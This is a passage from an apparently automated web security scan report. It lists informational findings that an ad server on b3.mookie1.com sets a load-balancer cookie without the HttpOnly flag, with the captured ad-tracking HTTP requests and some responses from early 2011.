Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

11.234. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

11.235. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875; ATTWL=CollectiveB3

Response

11.236. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

11.237. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

11.238. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

11.239. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

11.240. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

11.241. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

11.242. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

11.243. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296266487

Response

11.244. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,
...[SNIP]...

11.245. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

11.246. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,
...[SNIP]...

11.247. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

11.248. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

11.249. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
